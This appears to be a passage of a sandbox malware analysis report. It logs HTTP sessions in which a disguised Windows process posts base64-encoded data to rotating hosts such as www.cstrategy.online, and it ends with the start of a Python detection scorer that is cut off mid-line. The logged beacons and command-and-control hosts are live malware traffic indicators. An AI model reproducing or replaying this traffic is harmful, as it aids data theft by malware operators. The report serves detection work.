CF-RAY: 90038b290d05c33b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1684&rtt_var=842&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1671&delivery_rate=0&cwnd=169&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 09:30:14.230282068 CET | 571 | IN | Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20
Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.850017172.67.215.235803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:30:16.089102983 CET377OUTGET /an34/?m8=urJ0WtmP0FPTTB&DzLTc=CNTdLyZz4y5GtyaihT4QjOii4vbhvEXfI6qLlcD2dwDay6yy3VddH/MIEeXBPGgw7Dla3BC4dxGnjsgYjSxnMH2Hc8XocnANWTB8FhPTbLNabm+q6O9g6Njbhwnq8CC3Yg== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.airrelax.shop
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:30:16.780342102 CET1236INHTTP/1.1 200 OK
                                                                              Date: Sat, 11 Jan 2025 08:30:16 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              last-modified: Fri, 25 Oct 2024 07:07:10 GMT
                                                                              vary: Accept-Encoding
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-methods: GET, POST, OPTIONS
                                                                              access-control-allow-headers: User-Agent,Keep-Alive,Content-Type
                                                                              access-control-max-age: 1728000
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5nStmyHc%2F9mdgwzshSsHIRksISRQr8KH1K19%2F9VLaGlXjzMXu7qlFbTuaI3Mh%2FAH1nTSZRQsYTKCAU314tyitty2hCNe5sB81HSPUCsZNwaK2HXZ0WpC2MTCfHqAhqosHgfCIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 90038b38fa01435b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=377&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 37 32 39 66 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 09 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f
                                                                              Data Ascii: 729f<html lang=""><head><meta charset="utf-8"><meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cove" /><meta http-equiv="X-UA-Co
Jan 11, 2025 09:30:16.780355930 CET | 1236 | IN | Data Raw: 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d
                                                                              Data Ascii: mpatible" content="IE=edge"><link rel="icon" href="favicon.ico"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="yes" name="apple-touch-fullscreen"><title>gameshappy.top: Where happiness meets innovation | Online
Jan 11, 2025 09:30:16.780361891 CET | 1236 | IN | Data Raw: 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 61 70 70 22 3e 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 76 61 6e 2d 70 6f 70 75 70 20 76 61 6e
                                                                              Data Ascii: pt></head><body><div id="app"><div data-v-49759819="" class="van-popup van-popup--left"style="height: 100vh; min-width: 35%; color: rgb(8, 8, 8); overflow-y: auto; z-index: 2002; left: -20rem; transition: left 0.3s ease 0s;"><h
Jan 11, 2025 09:30:16.780371904 CET | 1236 | IN | Data Raw: 20 63 6c 61 73 73 3d 22 74 79 70 65 5f 69 74 65 6d 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 61 6c 74 3d
                                                                              Data Ascii: class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/puzzle.dd901ca5.png" data-src="img/puzzle.dd901ca5.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class="item_name"
Jan 11, 2025 09:30:16.780379057 CET | 1236 | IN | Data Raw: 0a 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 69 74 65 6d 5f 6e 61 6d 65 22 3e 0a 09 09 09 09 09 09 4b 69 64 73 0a 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 2f 64 69
                                                                              Data Ascii: <span data-v-49759819="" class="item_name">Kids</span></div></a><a data-v-49759819="" href="search.html?type=Strategy" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img
Jan 11, 2025 09:30:16.780432940 CET | 1236 | IN | Data Raw: 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 61 6c 74 3d 22 22 20 73 72 63 3d 22 69 6d 67 2f 63 6c 61 73 73 69 63 73 2e 63 62 39 39 36 31 63 36 2e 70 6e 67 22 20 64 61 74 61 2d 73 72 63
                                                                              Data Ascii: 9=""><img data-v-49759819="" alt="" src="img/classics.cb9961c6.png" data-src="img/classics.cb9961c6.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class="item_name">Classics</span></div
Jan 11, 2025 09:30:16.780440092 CET | 776 | IN | Data Raw: 33 38 2e 33 37 33 31 33 39 2d 33 38 2e 33 37 33 31 33 39 20 33 38 2e 33 37 33 31 33 39 7a 4d 38 32 38 2e 37 30 36 33 30 36 20 32 38 39 2e 39 39 38 36 30 31 68 2d 36 33 33 2e 34 31 32 36 31 32 63 2d 32 31 2e 31 38 31 39 37 33 20 30 2d 33 38 2e 33
                                                                              Data Ascii: 38.373139-38.373139 38.373139zM828.706306 289.998601h-633.412612c-21.181973 0-38.373139-17.191166-38.373138-38.373139s17.191166-38.373139 38.373138-38.373139h633.412612c21.181973 0 38.373139 17.191166 38.373138 38.373139s-17.191166 38.373139-3
Jan 11, 2025 09:30:16.780464888 CET | 1236 | IN | Data Raw: 30 39 31 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 32 34 20 31 30 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 0a 09 09 09 09 09 09 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76
                                                                              Data Ascii: 0911" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="3078" data-spm-anchor-id="a313x.7781069.0.i2"xmlns:xlink="http://www.w3.org/1999/xlink" width="1.5rem" height="1.5rem" class="icon"><path
Jan 11, 2025 09:30:16.780472040 CET | 1236 | IN | Data Raw: 64 69 76 20 64 61 74 61 2d 76 2d 30 35 34 34 37 39 33 66 3d 22 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76 2d 30 35 34 34 37 39 33 66 3d 22 22 20 74 3d 22 31 36 38 30 30 37 39 39 39 32 37 35 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20
                                                                              Data Ascii: div data-v-0544793f=""><svg data-v-0544793f="" t="1680079992751" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="15827" width="2rem" height="2rem" class="icon"><path data-v-0544793f=""d
Jan 11, 2025 09:30:16.780478954 CET | 1236 | IN | Data Raw: 64 65 78 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 39 66 33 35 64 38 33 32 3d 22 22 20 64 61 74 61 2d 76 2d 35 37 37 36 63 37 65 63 3d 22 22 20 63 6c 61 73 73 3d 22 64 65 66 61 75 6c 74 5f 74 69 74 6c 65 22 3e 0a 09 09
                                                                              Data Ascii: dex"><div data-v-9f35d832="" data-v-5776c7ec="" class="default_title"><div data-v-9f35d832="" class="title"><span data-v-9f35d832="">New Games</span></span><img data-v-9f35d832="" alt="" src="img/popula
Jan 11, 2025 09:30:16.785473108 CET | 1236 | IN | Data Raw: 09 09 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c
                                                                              Data Ascii: </path></svg></a></div></div></div><div data-v-5924636a="" class="top_game"></div></div></div>...<div id='div-gpt-ad-1711337596648-0' style='min-width: 0p


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 50018 | 194.76.119.60 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:30:22.299035072 CET | 643 | OUT | POST /zz3m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.cstrategy.online
                                                                              Origin: http://www.cstrategy.online
                                                                              Referer: http://www.cstrategy.online/zz3m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 6b 36 31 36 31 57 31 66 55 49 49 45 52 70 37 53 54 4e 6e 38 74 77 71 39 35 43 56 2b 41 46 56 41 45 7a 7a 39 31 47 54 4e 42 45 55 47 62 69 48 30 47 50 65 30 30 51 76 4a 47 77 75 58 70 67 53 31 53 6c 7a 53 77 48 69 33 41 52 43 56 78 64 4a 2b 6a 77 56 6d 53 45 56 35 50 4d 45 50 6a 35 43 6a 41 65 69 74 5a 73 50 74 6e 66 73 73 57 44 4f 61 53 2b 58 74 44 79 47 75 68 53 47 79 7a 68 6a 57 78 4e 45 43 68 74 76 70 2f 45 6f 4d 7a 74 58 7a 45 56 67 66 76 61 53 48 77 56 53 56 51 51 73 72 73 74 7a 62 63 78 75 31 62 62 44 54 36 74 56 55 47 56 49 30 66 50 2b 61 38 53 51 4a 62 6b 4a 42 54 70 42 66 58 4d 6f 3d
                                                                              Data Ascii: DzLTc=k6161W1fUIIERp7STNn8twq95CV+AFVAEzz91GTNBEUGbiH0GPe00QvJGwuXpgS1SlzSwHi3ARCVxdJ+jwVmSEV5PMEPj5CjAeitZsPtnfssWDOaS+XtDyGuhSGyzhjWxNEChtvp/EoMztXzEVgfvaSHwVSVQQsrstzbcxu1bbDT6tVUGVI0fP+a8SQJbkJBTpBfXMo=
Jan 11, 2025 09:30:22.995003939 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Sat, 11 Jan 2025 08:30:22 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/zz3m/
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.8 | 50019 | 194.76.119.60 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:30:24.857153893 CET | 663 | OUT | POST /zz3m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 226
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.cstrategy.online
                                                                              Origin: http://www.cstrategy.online
                                                                              Referer: http://www.cstrategy.online/zz3m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 6b 36 31 36 31 57 31 66 55 49 49 45 51 4a 4c 53 51 71 7a 38 6c 77 71 38 32 69 56 2b 53 46 55 4a 45 7a 2f 39 31 43 72 64 42 52 45 47 62 48 37 30 46 4b 71 30 78 51 76 4a 4a 51 75 65 6b 41 54 33 53 6c 33 38 77 47 65 33 41 53 2b 56 78 5a 5a 2b 67 44 74 68 53 55 56 37 44 73 45 33 74 5a 43 6a 41 65 69 74 5a 73 4c 44 6e 66 6b 73 57 7a 65 61 54 66 58 75 64 69 47 68 32 69 47 79 33 68 6a 53 78 4e 45 6b 68 73 7a 58 2f 47 51 4d 7a 73 6e 7a 45 48 49 65 6c 61 53 46 30 56 54 6c 52 6a 56 58 73 39 76 53 42 54 2b 68 66 35 2f 33 79 37 6b 2b 63 33 41 79 63 50 57 78 38 52 34 2f 65 54 55 70 4a 4b 52 76 4a 62 2f 78 69 43 34 4c 5a 77 6c 69 64 75 79 72 41 4b 66 6d 4f 38 4a 54
                                                                              Data Ascii: DzLTc=k6161W1fUIIEQJLSQqz8lwq82iV+SFUJEz/91CrdBREGbH70FKq0xQvJJQuekAT3Sl38wGe3AS+VxZZ+gDthSUV7DsE3tZCjAeitZsLDnfksWzeaTfXudiGh2iGy3hjSxNEkhszX/GQMzsnzEHIelaSF0VTlRjVXs9vSBT+hf5/3y7k+c3AycPWx8R4/eTUpJKRvJb/xiC4LZwliduyrAKfmO8JT
Jan 11, 2025 09:30:25.550276995 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Sat, 11 Jan 2025 08:30:25 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/zz3m/
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 50020 | 194.76.119.60 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:30:27.401523113 CET | 1680 | OUT | POST /zz3m/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 1242
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.cstrategy.online
                                                                              Origin: http://www.cstrategy.online
                                                                              Referer: http://www.cstrategy.online/zz3m/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 6b 36 31 36 31 57 31 66 55 49 49 45 51 4a 4c 53 51 71 7a 38 6c 77 71 38 32 69 56 2b 53 46 55 4a 45 7a 2f 39 31 43 72 64 42 53 6b 47 59 31 44 30 48 70 43 30 79 51 76 4a 41 77 75 54 6b 41 54 32 53 68 62 77 77 47 53 6e 41 58 36 56 7a 37 52 2b 6c 32 42 68 64 55 56 37 65 38 45 4d 6a 35 43 32 41 65 79 70 5a 73 62 44 6e 66 6b 73 57 78 57 61 44 2b 58 75 61 53 47 75 68 53 47 2b 7a 68 6a 32 78 4e 64 66 68 73 33 48 2f 57 77 4d 71 4d 33 7a 46 30 67 65 70 61 53 44 7a 56 54 39 52 69 70 79 73 39 7a 4a 42 53 36 4c 66 36 76 33 6a 75 5a 4b 49 6a 41 6b 4b 64 4b 47 77 6a 45 79 56 68 73 46 41 35 42 63 55 61 44 79 69 30 6c 6c 52 42 74 4a 66 39 66 64 65 4d 2f 43 48 4b 68 63 33 58 6f 4c 33 4f 54 6c 6a 43 59 48 4b 58 5a 6e 61 6a 4a 6a 72 55 2b 6d 31 69 63 38 2f 63 58 58 32 61 45 33 53 44 4d 77 69 31 62 64 72 70 66 61 30 59 50 69 6c 4d 54 52 71 56 41 33 51 4f 56 32 2b 44 61 6d 64 4b 38 39 76 57 6a 69 43 34 6f 2f 56 42 37 59 6d 63 6a 46 46 6a 64 6e 79 63 63 76 66 4f 6a 2b 51 75 51 47 64 42 31 36 4f 4b 34 67 [TRUNCATED]
                                                                              Data Ascii: DzLTc=k6161W1fUIIEQJLSQqz8lwq82iV+SFUJEz/91CrdBSkGY1D0HpC0yQvJAwuTkAT2ShbwwGSnAX6Vz7R+l2BhdUV7e8EMj5C2AeypZsbDnfksWxWaD+XuaSGuhSG+zhj2xNdfhs3H/WwMqM3zF0gepaSDzVT9Ripys9zJBS6Lf6v3juZKIjAkKdKGwjEyVhsFA5BcUaDyi0llRBtJf9fdeM/CHKhc3XoL3OTljCYHKXZnajJjrU+m1ic8/cXX2aE3SDMwi1bdrpfa0YPilMTRqVA3QOV2+DamdK89vWjiC4o/VB7YmcjFFjdnyccvfOj+QuQGdB16OK4g965WpMDEBxDDsRD3vzwg9khUyJ99MgCHClbb9jKDgsfivMazTLRzB6LMbA9lKo5U4MXFZE+MRE+DlXVyQAmhxst0RgBp6+FF0dqv3Mk/AtvPJBiNPRemgDkvIDDcDs9wckgFz1oeAJL7VuX4kynp/pw7bpdgYT7j1kw8ecuaIp8N8j9/rkEH6WompcSQlmAo8NlFZNbbklXPPkSiORAOwArLXO8J+W1kPsTeghgYp7Vt3SnVFovsHYaXXqPqvj5i8aYSinAqfwvMH3uwO9qfY5CODzaHAL8jIA1h08WEz/TNcHu7fXBzHrCUSgqba3Tp1UAbDcLxZf3OM2JGVN7BX3FTWy9yhJ6igaerBOI25yGaeQsGn4loehqkdmEYB+mnyux26vGh0mNPO/tBBUK5dcttSOc+mzTds1STfBv2j5pludw26IPoxe9sGdR+ZB321ENpgi/6cc1Bhv6iKBv0830x9r2HYB45SSLKqq1w5f/WRcj6Vb7uFjD0RZyVUduqcnDuJr+y1bN40Dn4lsVlaMoMVrE2aFUznAq7CgY1SNRkAxWkvbgWdAf0bwcMoo7IpQ/dTwszJWFdZwKHrUwAhnbmUOwieQCpVGXM4xie14rm/Ed+BylB7/lw7fPAc9UO7WeJInH/CeAokMb/uMkS6VURf9RaLQrwso [TRUNCATED]
Jan 11, 2025 09:30:28.085520029 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Sat, 11 Jan 2025 08:30:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/zz3m/
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 50021 | 194.76.119.60 | 80 | 3920 | C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:30:29.944894075 CET | 380 | OUT | GET /zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7+hR5I2wPXRunqm38WzEuQm6NKJG/l1bLZhOfnTn2NFbWxBmCDQqA3K9Xvzl9TW5cdeUdvoi/F++BAfC2g+APWC2NffnCCUzK9ka60xikyw==&m8=urJ0WtmP0FPTTB HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.cstrategy.online
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 09:30:30.644478083 CET | 548 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Sat, 11 Jan 2025 08:30:30 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/zz3m/?DzLTc=p4da2npHVYx4RJTvd9az3TD7+hR5I2wPXRunqm38WzEuQm6NKJG/l1bLZhOfnTn2NFbWxBmCDQqA3K9Xvzl9TW5cdeUdvoi/F++BAfC2g+APWC2NffnCCUzK9ka60xikyw==&m8=urJ0WtmP0FPTTB
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
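Sessions 41 to 44 above, and session 45 that follows, share one shape: the same Windows process (PID 3920, WafZCahkNS.exe) sends a POST or GET to a short path on a rotating host, always with a Linux/X11 Chrome 31 User-Agent, with one short parameter (DzLTc) carrying a long base64-looking blob, and every server answers with a 301 to HTTPS or a 404 rather than acknowledging the beacon. The scorer below turns that shape into a detection and runs it over the requests transcribed from sessions 41, 44 and 45 plus a constructed benign request. It is an added example, not code from Joe Sandbox, from the sample or from any malware family's tooling; the weights, the alert threshold and the control request are assumptions made for the example.

```python
"""Score the HTTP beacon shape seen in sessions 41, 44 and 45 of this report.

Added example for illustration: not code from Joe Sandbox, from the sample or
from any malware family's tooling. Request fields are transcribed from the
sessions above; CONTROL, the weights and the threshold are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{48,}={0,2}$")  # long base64-alphabet value
SHORT_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/?$")     # one short random-looking segment
CHROME_MAJOR = re.compile(r"Chrome/(\d+)\.")

@dataclass
class HttpSession:
    session: int
    process: str      # client process path as recorded by the sandbox
    method: str
    host: str
    target: str       # request path, including the query string for GET
    user_agent: str
    body: str = ""    # raw POST body, not URL-decoded
    status: int = 0   # HTTP status of the server's reply

@dataclass
class Finding:
    session: int
    score: int = 0
    reasons: List[str] = field(default_factory=list)

# Values below are copied from the sessions in this report.
SAMPLE_UA = ("Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36")
PROC = (r"C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr"
        r"\WafZCahkNS.exe")
SESSIONS = [
    HttpSession(41, PROC, "POST", "www.cstrategy.online", "/zz3m/", SAMPLE_UA, status=301,
                body="DzLTc=k6161W1fUIIERp7STNn8twq95CV+AFVAEzz91GTNBEUGbiH0GPe00QvJGwuXpgS1SlzS"
                     "wHi3ARCVxdJ+jwVmSEV5PMEPj5CjAeitZsPtnfssWDOaS+XtDyGuhSGyzhjWxNEChtvp/EoMztXz"
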